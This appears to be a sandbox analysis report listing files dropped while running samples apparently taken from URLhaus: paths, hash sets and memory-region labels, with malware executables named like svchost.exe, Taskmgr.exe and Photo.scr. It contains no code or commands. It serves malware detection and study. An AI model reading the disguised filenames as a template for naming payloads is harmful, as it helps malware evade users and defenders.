MD5 9a4957bdc2a783ed4ba681cba2c99c5c
SHA1 f73d33677f5c61deb8a736e8dde14e1924e0b0dc
SHA256 f7f57807c15c21c5aa9818edf3993d0b94aef8af5808e1ad86a98637fc499d44
SHA512 027bdcb5b3e0ca911ee3c94c42da7309ea381b4c8ec27cf9a04090fff871db3cf9b7b659fdbcfff8887a058cb9b092b92d7d11f4f934a53be81c29ef8895ac2b

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_ssl.pyd

MD5 069bccc9f31f57616e88c92650589bdd
SHA1 050fc5ccd92af4fbb3047be40202d062f9958e57
SHA256 cb42e8598e3fa53eeebf63f2af1730b9ec64614bda276ab2cd1f1c196b3d7e32
SHA512 0e5513fbe42987c658dba13da737c547ff0b8006aecf538c2f5cf731c54de83e26889be62e5c8a10d2c91d5ada4d64015b640dab13130039a5a8a5ab33a723dc

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_socket.pyd

MD5 8140bdc5803a4893509f0e39b67158ce
SHA1 653cc1c82ba6240b0186623724aec3287e9bc232
SHA256 39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769
SHA512 d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_queue.pyd

MD5 ff8300999335c939fcce94f2e7f039c0
SHA1 4ff3a7a9d9ca005b5659b55d8cd064d2eb708b1a
SHA256 2f71046891ba279b00b70eb031fe90b379dbe84559cf49ce5d1297ea6bf47a78
SHA512 f29b1fd6f52130d69c8bd21a72a71841bf67d54b216febcd4e526e81b499b9b48831bb7cdff0bff6878aab542ca05d6326b8a293f2fb4dd95058461c0fd14017

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_overlapped.pyd

MD5 01ad7ca8bc27f92355fd2895fc474157
SHA1 15948cd5a601907ff773d0b48e493adf0d38a1a6
SHA256 a083e83f609ed7a2fc18a95d44d8f91c9dc74842f33e19e91988e84db94c3b5b
SHA512 8fe6ac8430f8dde45c74f45575365753042642dc9fa9defbcf25ae1832baf6abb1ea1ad6d087e4ece5d0590e36cee1beea99845aef6182c1eec4bafdf9557604

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_multiprocessing.pyd

MD5 1386dbc6dcc5e0be6fef05722ae572ec
SHA1 470f2715fafd5cafa79e8f3b0a5434a6da78a1ba
SHA256 0ae3bf383ff998886f97576c55d6bf0a076c24395cf6fcd2265316e9a6e8c007
SHA512 ca6e5c33273f460c951cb8ec1d74ce61c0025e2ead6d517c18a6b0365341a0fd334e8976006cd62b72eb5620ccc42cfdd5196e8b10691b8f19f69f851a440293

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_lzma.pyd

MD5 337b0e65a856568778e25660f77bc80a
SHA1 4d9e921feaee5fa70181eba99054ffa7b6c9bb3f
SHA256 613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a
SHA512 19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_hashlib.pyd

MD5 de4d104ea13b70c093b07219d2eff6cb
SHA1 83daf591c049f977879e5114c5fea9bbbfa0ad7b
SHA256 39bc615842a176db72d4e0558f3cdcae23ab0623ad132f815d21dcfbfd4b110e
SHA512 567f703c2e45f13c6107d767597dba762dc5caa86024c87e7b28df2d6c77cd06d3f1f97eed45e6ef127d5346679fea89ac4dc2c453ce366b6233c0fa68d82692

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_decimal.pyd

MD5 d47e6acf09ead5774d5b471ab3ab96ff
SHA1 64ce9b5d5f07395935df95d4a0f06760319224a2
SHA256 d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e
SHA512 52e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_cffi_backend.cp311-win_amd64.pyd

MD5 739d352bd982ed3957d376a9237c9248
SHA1 961cf42f0c1bb9d29d2f1985f68250de9d83894d
SHA256 9aee90cf7980c8ff694bb3ffe06c71f87eb6a613033f73e3174a732648d39980
SHA512 585a5143519ed9b38bb53f912cea60c87f7ce8ba159a1011cf666f390c2e3cc149e0ac601b008e039a0a78eaf876d7a3f64fff612f5de04c822c6e214bc2efde

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_bz2.pyd

MD5 4101128e19134a4733028cfaafc2f3bb
SHA1 66c18b0406201c3cfbba6e239ab9ee3dbb3be07d
SHA256 5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80
SHA512 4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_brotli.cp311-win_amd64.pyd

MD5 d9fc15caf72e5d7f9a09b675e309f71d
SHA1 cd2b2465c04c713bc58d1c5de5f8a2e13f900234
SHA256 1fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf
SHA512 84f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006

C:\Users\Admin\AppData\Local\Temp\_MEI24682\_asyncio.pyd

MD5 2859c39887921dad2ff41feda44fe174
SHA1 fae62faf96223ce7a3e6f7389a9b14b890c24789
SHA256 aebc378db08617ea81a0a3a3bc044bcc7e6303e314630392dd51bab12f879bd9
SHA512 790be0c95c81eb6d410e53fe8018e2ca5efd1838dc60539ebb011911c36c8478333ee95989cfd1ddaf4f892b537ae8305eb4cd893906930deae59c8965cf2fbb

C:\Users\Admin\AppData\Local\Temp\_MEI24682\unicodedata.pyd

MD5 bc58eb17a9c2e48e97a12174818d969d
SHA1 11949ebc05d24ab39d86193b6b6fcff3e4733cfd
SHA256 ecf7836aa0d36b5880eb6f799ec402b1f2e999f78bfff6fb9a942d1d8d0b9baa
SHA512 4aa2b2ce3eb47503b48f6a888162a527834a6c04d3b49c562983b4d5aad9b7363d57aef2e17fe6412b89a9a3b37fb62a4ade4afc90016e2759638a17b1deae6c

C:\Users\Admin\AppData\Local\Temp\_MEI24682\select.pyd

MD5 97ee623f1217a7b4b7de5769b7b665d6
SHA1 95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0
SHA256 0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790
SHA512 20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

C:\Users\Admin\AppData\Local\Temp\_MEI24682\pyexpat.pyd

MD5 1c0a578249b658f5dcd4b539eea9a329
SHA1 efe6fa11a09dedac8964735f87877ba477bec341
SHA256 d97f3e27130c267e7d3287d1b159f65559e84ead9090d02a01b4c7dc663cd509
SHA512 7b21dcd7b64eeba13ba8a618960190d1a272fa4805dedcf8f9e1168aebfe890b0ced991435ecbd353467a046fc0e8307f9a9be1021742d7d93aa124c52cc49e6

C:\Users\Admin\AppData\Local\Temp\_MEI24682\libssl-1_1.dll

MD5 8769adafca3a6fc6ef26f01fd31afa84
SHA1 38baef74bdd2e941ccd321f91bfd49dacc6a3cb6
SHA256 2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071
SHA512 fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

C:\Users\Admin\AppData\Local\Temp\_MEI24682\libcrypto-1_1.dll

MD5 6f4b8eb45a965372156086201207c81f
SHA1 8278f9539463f0a45009287f0516098cb7a15406
SHA256 976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541
SHA512 2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

C:\Users\Admin\AppData\Local\Temp\_MEI24682\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

MD5 4ce7501f6608f6ce4011d627979e1ae4
SHA1 78363672264d9cd3f72d5c1d3665e1657b1a5071
SHA256 37fedcffbf73c4eb9f058f47677cb33203a436ff9390e4d38a8e01c9dad28e0b
SHA512 a4cdf92725e1d740758da4dd28df5d1131f70cef46946b173fe6956cc0341f019d7c4fecc3c9605f354e1308858721dada825b4c19f59c5ad1ce01ab84c46b24

C:\Users\Admin\AppData\Local\Temp\_MEI24682\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

MD5 bac273806f46cffb94a84d7b4ced6027
SHA1 773fbc0435196c8123ee89b0a2fc4d44241ff063
SHA256 1d9aba3ff1156ea1fbe10b8aa201d4565ae6022daf2117390d1d8197b80bb70b
SHA512 eaec1f072c2c0bc439ac7b4e3aea6e75c07bd4cd2d653be8500bbffe371fbfe045227daead653c162d972ccaadff18ac7da4d366d1200618b0291d76e18b125c

C:\Users\Admin\AppData\Local\Temp\_MEI24682\certifi\cacert.pem

MD5 50ea156b773e8803f6c1fe712f746cba
SHA1 2c68212e96605210eddf740291862bdf59398aef
SHA256 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47
SHA512 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

C:\Users\Admin\AppData\Local\Temp\_MEI24682\multidict\_multidict.cp311-win_amd64.pyd

MD5 ecc0b2fcda0485900f4b72b378fe4303
SHA1 40d9571b8927c44af39f9d2af8821f073520e65a
SHA256 bcbb43ce216e38361cb108e99bab86ae2c0f8930c86d12cadfca703e26003cb1
SHA512 24fd07eb0149cb8587200c055f20ff8c260b8e626693c180cba4e066194bed7e8721dde758b583c93f7cb3d691b50de6179ba86821414315c17b3d084d290e70

C:\Users\Admin\AppData\Local\Temp\_MEI24682\yarl\_quoting_c.cp311-win_amd64.pyd

MD5 1c6c610e5e2547981a2f14f240accf20
SHA1 4a2438293d2f86761ef84cfdf99a6ca86604d0b8
SHA256 4a982ff53e006b462ddf7090749bc06ebb6e97578be04169489d27e93f1d1804
SHA512 f6ea205a49bf586d7f3537d56b805d34584a4c2c7d75a81c53ce457a4a438590f6dbeded324362bfe18b86ff5696673de5fbe4c9759ad121b5e4c9ae2ef267c0

C:\Users\Admin\AppData\Local\Temp\_MEI24682\propcache\_helpers_c.cp311-win_amd64.pyd

MD5 04444380b89fb22b57e6a72b3ae42048
SHA1 cfe9c662cb5ca1704e3f0763d02e0d59c5817d77
SHA256 d123d7fefde551c82eb61454d763177322e5ce1eaa65dc489e19de5ab7faf7b4
SHA512 9e7d367bab0f6cc880c5870fdcdb06d9a9e5eb24eba489ca85549947879b0fa3c586779ffcea0fca4c50aa67dad098e7bd9e82c00e2d00412d9441991267d2da

C:\Users\Admin\AppData\Local\Temp\_MEI24682\charset_normalizer\md.cp311-win_amd64.pyd

MD5 cbf62e25e6e036d3ab1946dbaff114c1
SHA1 b35f91eaf4627311b56707ef12e05d6d435a4248
SHA256 06032e64e1561251ea3035112785f43945b1e959a9bf586c35c9ea1c59585c37
SHA512 04b694d0ae99d5786fa19f03c5b4dd8124c4f9144cfe7ca250b48a3c0de0883e06a6319351ae93ea95b55bbbfa69525a91e9407478e40ad62951f1d63d45ff18

C:\Users\Admin\Downloads\UrlHausFiles\feAo1nZ.exe

MD5 e3eb0a1df437f3f97a64aca5952c8ea0
SHA1 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA256 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA512 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

MD5 2697c90051b724a80526c5b8b47e5df4
SHA1 749d44fe2640504f15e9bf7b697f1017c8c2637d
SHA256 f8b23a264f58e9001e087af2bf48eed5938db31b5b1b20d973575cfa6a121355
SHA512 d0c8d76699f2f88d76eeaf211e59a780969b7692b513495a34013af8380d3fe0616caf03c6e47b8e7721d2f0a369c1dd20860b755b7d607783a99080c5f5315b

memory/232-135-0x0000000074E32000-0x0000000074E33000-memory.dmp

memory/232-136-0x0000000074E30000-0x00000000753E1000-memory.dmp

memory/232-137-0x0000000074E30000-0x00000000753E1000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe

MD5 56944be08ed3307c498123514956095b
SHA1 53ffb50051da62f2c2cee97fe048a1441e95a812
SHA256 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181
SHA512 aa196a1a1e44c3fde974bbf8a031e6943a474d16d5a956b205d283ee5be53e110dba52817f7f2782e7ecc8783fea77f9c34613f99fb81fe09d2bea8b2f91bc13

C:\Users\Admin\AppData\Local\Temp\nswBDB3.tmp\nsExec.dll

MD5 11092c1d3fbb449a60695c44f9f3d183
SHA1 b89d614755f2e943df4d510d87a7fc1a3bcf5a33
SHA256 2cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77
SHA512 c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a

C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe

MD5 2dcfbac83be168372e01d4bd4ec6010c
SHA1 5f0cf3f5be05b478dec3a55b7e1757ca7c1a7fd3
SHA256 68fbb7d4c5af27b3941f4db758e2007decdd35849ab025a9e06d2ad4718b8b63
SHA512 a5acad6b7f97472367f59e85e8d61e7bbf25d6a1fc9054910780593440a2345d9ec8bb22a7f41b5b8f85eacbab9f8971dbe31c11c4c887647f86140f98e5a143

memory/1564-165-0x0000000000400000-0x000000000047D000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

MD5 2d79aec368236c7741a6904e9adff58f
SHA1 c0b6133df7148de54f876473ba1c64cb630108c1
SHA256 b33f25c28bf15a787d41472717270301071af4f10ec93fa064c96e1a33455c35
SHA512 022c5d135f66bc253a25086a2e9070a1ae395bdedd657a7a5554563dace75e1cbfe77c87033d6908d72deeab4a53f50e8bd202c4f6d6a9f17a19a9ebfdfe9538

memory/232-179-0x0000000074E30000-0x00000000753E1000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\langla.exe

MD5 24fbdb6554fadafc115533272b8b6ea0
SHA1 8c874f8ba14f9d3e76cf73d27ae8806495f09519
SHA256 1954e0151deb50691b312e7e8463bd2e798f78ff0d030ce1ef889e0207cc03aa
SHA512 155853c0d8706b372ba9bc6bce5eb58e8bd332fd30900b26c4f3cc7d1e769259bc1c79eeca1ad72830cee06b79500cea12636b865bf8b571c4a790fbb1bbd7da

memory/2120-193-0x00000000000E0000-0x00000000000F2000-memory.dmp

memory/1004-204-0x0000000000400000-0x000000000066D000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

MD5 a55d149ef6d095d1499d0668459c236f
SHA1 f29aae537412267b0ad08a727ccf3a3010eea72b
SHA256 c4a5fdd606768f6f69aa9e6cad874296c8e1e85f88b17f12b4ecab2c247c54ce
SHA512 2c89c0b92afaf69e7c1a63e44ebbe41c7919ad74abd2b70a6077faa6a4ca24bc6103ddf584633cd177a858550c667b430668095c3dc9abb27fefa38940d4370b

memory/4928-212-0x0000000000400000-0x0000000000459000-memory.dmp

memory/4928-213-0x0000000000400000-0x0000000000459000-memory.dmp

memory/2120-214-0x00000000049F0000-0x0000000004A8C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\22.exe

MD5 3126725f67989c5f249c4c2bd1da2c64
SHA1 2fa7be1edc151e2db8ad6b0dd564f1ab66bc66c1
SHA256 0f504cead80baca0c4be82bd9342de07b0757b4c6e88e4554d867fd1249ac2f5
SHA512 18784922ed97b7db46907045cfca669eee1c21237cc21eed39c5b1f78dc791900fc3a5fbc1415cc3a8ee5595f7997e2d977cfddb205f602e4dd6fafebe6281c0

memory/1564-228-0x0000000000400000-0x000000000047D000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr

MD5 aba2d86ed17f587eb6d57e6c75f64f05
SHA1 aeccba64f4dd19033ac2226b4445faac05c88b76
SHA256 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d
SHA512 c3f276820d6b2872c98fa36c7b62f236f9f2650b344a243a30dcda9ca08726f6ce27c5c380b4256a1a7d8d4309e1f2f270f10bad18099a8c9e1835925ea51806

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\df539c11-8740-421e-bd22-2c40f832d5af.tmp

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe

MD5 18cf1b1667f8ca98abcd5e5dceb462e9
SHA1 62cf7112464e89b9fa725257fb19412db52edafd
SHA256 56a8033f43692f54e008b7a631c027682e1cabd4450f9f45ce10d4fc10f3fcf3
SHA512 b66be8acac0152ae3a9a658fde23f3f3ad026e3f8099df5c8771eb1524e8baa2ba9f88b9577a85493f0e241089798e40a158325cb606345c94d979e0088443d0

memory/1076-276-0x0000000000400000-0x0000000000833000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

MD5 2fcfe990de818ff742c6723b8c6e0d33
SHA1 9d42cce564dcfa27b2c99450f54ba36d4b6eecaf
SHA256 cb731802d3cd29da2c01ffbb8c8ed4ef7de9d91c133b69b974583bede6bfd740
SHA512 4f20a27817de94a07071960abe0123277c0607a26de709e2ade201597df71d8c2eec7da353efba94dc6a8369b89db4caeaf9505d02b90dc30c37010a885c3613

memory/392-294-0x00000000008B0000-0x0000000000BD4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scoped_dir932_1717073959\7d26c4d8-4595-46f3-b66b-38d12fb1da6c.tmp

MD5 3f6f93c3dccd4a91c4eb25c7f6feb1c1
SHA1 9b73f46adfa1f4464929b408407e73d4535c6827
SHA256 19f05352cb4c6e231c1c000b6c8b7e9edcc1e8082caf46fff16b239d32aa7c9e
SHA512 d488fa67e3a29d0147e9eaf2eabc74d9a255f8470cf79a4aea60e3b3b5e48a3fcbc4fc3e9ce58dff8d7d0caa8ae749295f221e1fe1ba5d20deb2d97544a12ba4

C:\Users\Admin\AppData\Local\Temp\scoped_dir932_1717073959\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe

MD5 759f5a6e3daa4972d43bd4a5edbdeb11
SHA1 36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512 f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

memory/5112-689-0x00007FF7E4E50000-0x00007FF7E4ECD000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 93a1ef9166e5cd9a02c650c0632e734f
SHA1 dea59cfeb8d582fa3ff967898fcfb6688b959c1d
SHA256 b99a658f904c56963599b5febe6d657275bc390a2593d1bbddd7a16a519e65ee
SHA512 f8bae96f557a1bf94c3b895dbb17db20024c3173f0945e8326231893f881f26f43dcecfe93f45cabff38b0592d5311b2a39d3277d2d0fa2250a92f1f87bee735

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d22073dea53e79d9b824f27ac5e9813e
SHA1 6d8a7281241248431a1571e6ddc55798b01fa961
SHA256 86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
SHA512 97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mlphbjap.jdr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5492-716-0x000001DFC5B10000-0x000001DFC5B32000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\67954269-da1e-47f5-910b-451a519e51ce.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bffcefacce25cd03f3d5c9446ddb903d
SHA1 8923f84aa86db316d2f5c122fe3874bbe26f3bab
SHA256 23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
SHA512 761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 aa797867d5b45c8fcb3ce9e3fc8ca1fe
SHA1 fd3ebb970a79a0ebdafa48c488943f0f6afce81a
SHA256 9f67d568ba40c7f6c65d0d14468549ba3fc9c619426e310cad2760db2b7f1ecf
SHA512 03f7ea2db05c3838573f81acaac3e458db2d5882f0b935a7762e7b13e19114b1ff987e083fa2b04e9e7e28c697069ba2c5c6aa210b1b14c5f51e0e2ee25db378

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe

MD5 98c07fea9bc60a8d90ae1b2c205e471b
SHA1 e088f4ddcf646d9d3d823bfc67de5792d60a45e2
SHA256 7a7320ea11f7363ba658c1e371e89cf4964d9eb4f88bb92e18490bf1f506c18f
SHA512 aaae87d544aa2c4e950a63a3bba9206e916b7343d22692d5fdd5ad5db4abb3b0329ae621aac276992d05975876362dfe1b8d549e2887350eee37883ef3850a45

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7432df87364d41c225264962ce00e1c5
SHA1 c86e42d5a7771321f04fbedc0f4b3ff51a541b39
SHA256 0ab0eccfaa82b01a47e973241f4864cbb12dd739ac2b87763a89f13605b7cf5f
SHA512 4d4790986fb2d43b39c11c14791f4923ff421ed4e79245fbe71314896f922f701fcd0d7e40faef58f53a8fb5b273e441c5bddd8d454bcdbcffb82ed0ca025270

memory/1076-896-0x0000000000400000-0x0000000000833000-memory.dmp

memory/1076-895-0x0000000000400000-0x0000000000833000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 c02ba0783524ac6a002584df32d7e17c
SHA1 255cee28715d8b61153c675597d47b129f392f13
SHA256 bd7691f88d4f137f854b08bbb49450e57524b794a41a4101b4d787d1b0f0005d
SHA512 7ed3471daac7069634a2e67b140b05a1a335b02c792533b80e9baf7ec948dd5f943b337ca7a93c36c8ad09038a5e11cffabea64f41c54a00dd47d90da6b3b5a9

memory/3240-908-0x00007FF6A1D30000-0x00007FF6A1F6C000-memory.dmp

memory/3240-907-0x00007FF6A1D30000-0x00007FF6A1F6C000-memory.dmp

memory/3240-910-0x00007FF6A1D30000-0x00007FF6A1F6C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

MD5 6c098287139a5808d04237dd4cdaec3f
SHA1 aea943805649919983177a66d3d28a5e964da027
SHA256 53932083665adaf933f3d524e1d8399ee4530e03b53d0d39fcbc227041e6a787
SHA512 a9430d0661271f5f988aa14165b945faf4120cc7ed4f751e8f2f4498a7d7c74f03652f45c35035027e112976206054af831d5bd8909377b3947a8a87950afa47

memory/6136-931-0x0000000140000000-0x00000001400042C8-memory.dmp

memory/5740-951-0x0000000000400000-0x0000000002AA2000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe

MD5 ea257066a195cc1bc1ea398e239006b2
SHA1 fce1cd214c17cf3a56233299bf8808a46b639ae1
SHA256 81e95eaca372c94265746b08aac50120c45e6baae7c521a8a23dd0dfdc3b9410
SHA512 57c01e41e30259632ffbe35a7c07cc8b81524ca26320605750a418e0e75f229d2704ae226106147d727fe6330bc5268f7a2a9838fa2e7b0178eadf056682a12f

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

MD5 d259a1c0c84bbeefb84d11146bd0ebe5
SHA1 feaceced744a743145af4709c0fccf08ed0130a0
SHA256 8de12184a006d3340241492baca0ba1034182b08d3c6a0f09c0af99d539bd48b
SHA512 84944d132fb47be7d22e55456bc1c4bbb93ce281b775e57641a012602f77219c6a9c75ed67ca1fbec1ee15550dee58b9a8adeacbe136e58d2ed1f4c6b755fd54

memory/5808-1004-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 60c97be0da178b2b75c7d6a7012ff548
SHA1 62681e6e9fa9fde0cb862c4c62aabe2174fb1bd2
SHA256 d1d122d87cc5bd58e4db851759fa2ca28f70aa238bb97cbcf0cca0fb9869af8c
SHA512 86e1f48b510919c9a8463ab904c563a4b52ab85ced23e8233eb03873fed2be7e7ca149a90c4b0353086c15b39b070fb8cbefc775cdf55d2fcf45180456ab9f2f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d86356c605f3499d5079f9e1b867f59f
SHA1 98ddb3b0c5d73dc50b58f0a47a7c29a689c76451
SHA256 49661a712494fe9b29a55dbe2300400687c036416951c6ce563d43c747dbe9a2
SHA512 5c3caecc56aa383cee322624715df1677933fa2ba99d979f2ef2bfd0c5ca2d031c76da59ca039a1625857ba5f457dcb7c24f2cbcbf92166df3d1b2ad2a250881

memory/5808-1021-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1076-1041-0x0000000000400000-0x0000000000833000-memory.dmp

memory/5028-1081-0x0000000180000000-0x0000000180820000-memory.dmp

memory/5028-1106-0x000001D34C130000-0x000001D34C150000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

MD5 a62abdeb777a8c23ca724e7a2af2dbaa
SHA1 8b55695b49cb6662d9e75d91a4c1dc790660343b
SHA256 84bde93f884b8308546980eb551da6d2b8bc8d4b8f163469a39ccfd2f9374049
SHA512 ac04947446c4cb81bb61d9326d17249bca144b8af1ecdf1ac85b960c603e333b67ab08791e0501aee08939f54e517e6574895b1e49a588011008f8f060731169

